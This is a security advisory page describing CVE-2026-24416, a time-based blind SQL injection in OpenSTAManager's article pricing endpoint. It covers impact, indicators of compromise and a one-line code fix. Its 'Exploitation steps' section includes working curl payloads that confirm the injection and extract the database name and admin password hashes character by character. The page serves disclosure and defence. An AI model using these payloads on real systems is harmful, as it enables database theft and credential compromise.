CVE-2026-24416: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-24416 is a Time-Based Blind SQL Injection vulnerability in the article pricing module of OpenSTAManager, an open-source management software for technical assistance and invoicing. The flaw affects all versions up to and including v2.9.8 and was disclosed on February 6, 2026, by researcher Łukasz Rybak. It carries a CVSS v3.1 score of 6.5 (Medium) and a CVSS v4.0 score of 8.7 (High) (GitHub Advisory, OSM Security Advisory).

Technical details

The root cause (CWE-89) is an inconsistent application of parameterized queries in /modules/articoli/ajax/complete.php. In a UNION SQL query that fetches article pricing history, the idarticolo GET parameter is directly concatenated into the WHERE clause at line 70 (WHERE \idarticolo`='.$idarticolo.') without being wrapped in the application's prepare()function, while the adjacentidanagraficaparameter is correctly sanitized. This allows an authenticated attacker to inject arbitrary SQL via theidarticoloparameter in requests to/ajax_complete.php?op=getprezzi, using time-based Boolean inference (e.g., SLEEP()`) to extract data character by character. Exploitation requires only a valid low-privilege authenticated session with access to the article pricing functionality (OSM Security Advisory).

Impact

Successful exploitation allows an authenticated attacker to extract the complete database contents, including user credentials (usernames and bcrypt password hashes), customer data, and financial records such as invoices and orders. The vulnerability also enables unauthorized modification or deletion of database records, and could potentially be leveraged for further system compromise depending on database server configuration. The CVSS v4.0 assessment rates confidentiality, integrity, and availability impacts all as High for the vulnerable system (GitHub Advisory, OSM Security Advisory).

Exploitability

A detailed proof-of-concept (PoC), including both manual curl-based payloads and a full automated Python extraction script, was published alongside the advisory on February 6, 2026 (OSM Security Advisory). The vulnerability was confirmed and tested on live instances running v2.9.8 and v2.9.7. There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.015% (3rd percentile), and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Authenticate: Obtain valid credentials for an OpenSTAManager account with access to the article pricing (Articoli) module. Log in using a POST request to /index.php?op=login and capture the session cookie.
curl -c /tmp/cookies.txt -X POST 'http://TARGET/index.php?op=login' -d 'username=USER&password=PASS'
  1. Confirm vulnerability: Send a time-based SLEEP payload via the idarticolo GET parameter to /ajax_complete.php?op=getprezzi and measure response time. A delay matching the SLEEP value confirms injection.
curl -s -b /tmp/cookies.txt "http://TARGET/ajax_complete.php?op=getprezzi&idanagrafica=1&idarticolo=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))a)"
  1. Extract database name: Use Boolean-based SUBSTRING inference with SLEEP to enumerate the database name character by character.
curl -s -b /tmp/cookies.txt "http://TARGET/ajax_complete.php?op=getprezzi&idanagrafica=1&idarticolo=1%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)"
  1. Extract credentials: Query the zz_users table to extract admin usernames and bcrypt password hashes character by character using the same time-based inference technique.
curl -s -b /tmp/cookies.txt "http://TARGET/ajax_complete.php?op=getprezzi&idanagrafica=1&idarticolo=1%20AND%20(SELECT%20SUBSTRING(password,1,1)%20FROM%20zz_users%20WHERE%20id=1)=%27%24%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)"
  1. Automate extraction: Use the published Python script to automate full database, username, and password hash extraction against the target instance (OSM Security Advisory).

Indicators of compromise

  • Network: Repeated GET requests to /ajax_complete.php?op=getprezzi with URL-encoded SQL keywords (SLEEP, SUBSTRING, SELECT, AND) in the idarticolo parameter; unusually high response times (e.g., 2–10+ seconds) for requests to this endpoint.
  • Logs: Web server access logs showing requests to /ajax_complete.php with idarticolo values containing %20AND%20, SLEEP, SUBSTRING, or ORD patterns; sequences of near-identical requests differing only in the tested character or position (indicative of automated extraction).
  • Database: Slow query logs showing repeated time-delayed queries against dt_righe_ddt or co_righe_documenti tables with injected SQL conditions; unexpected queries against zz_users table from the web application context.

Mitigation and workarounds

The fix requires modifying line 70 of /modules/articoli/ajax/complete.php to wrap the idarticolo parameter with the application's prepare() function, changing WHERE \idarticolo`='.$idarticolo.'toWHERE `idarticolo`='.prepare($idarticolo).'`. As of the advisory publication date, no patched release version has been issued by the vendor. Administrators should apply the one-line code fix manually, restrict access to the article pricing functionality to only necessary users, and conduct a broader audit of SQL queries across the codebase for similar inconsistencies (OSM Security Advisory, GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management